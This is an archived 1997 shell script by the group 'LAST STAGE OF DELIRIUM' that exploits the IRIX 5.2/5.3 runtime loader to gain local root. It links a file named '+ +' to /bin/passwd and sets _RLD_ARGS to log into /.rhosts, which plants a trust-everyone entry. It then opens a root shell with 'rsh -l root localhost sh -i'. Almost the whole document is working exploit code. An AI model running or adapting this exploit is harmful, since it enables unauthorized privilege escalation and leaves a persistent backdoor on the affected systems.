home *** CD-ROM | disk | FTP | other *** search
- #!/bin/sh
- ## copyright LAST STAGE OF DELIRIUM jul 1997 poland *://lsd-pl.net/ #
- ## runtime loader #
-
- echo "copyright LAST STAGE OF DELIRIUM jul 1997 poland //lsd-pl.net/"
- echo "runtime loader for irix 5.2 5.3 IP:all\n"
-
- SYMLINK="
- + +
- "
-
- ln -s /bin/passwd "$SYMLINK"
- _RLD_ARGS="-log /.rhosts -pixie -no_pixie_init"
- export _RLD_ARGS
-
- "$SYMLINK"
-
- _RLD_ARGS=""
- export _RLD_ARGS
- rm -f "$SYMLINK"
-
- rsh -l root localhost sh -i
-
-
-
-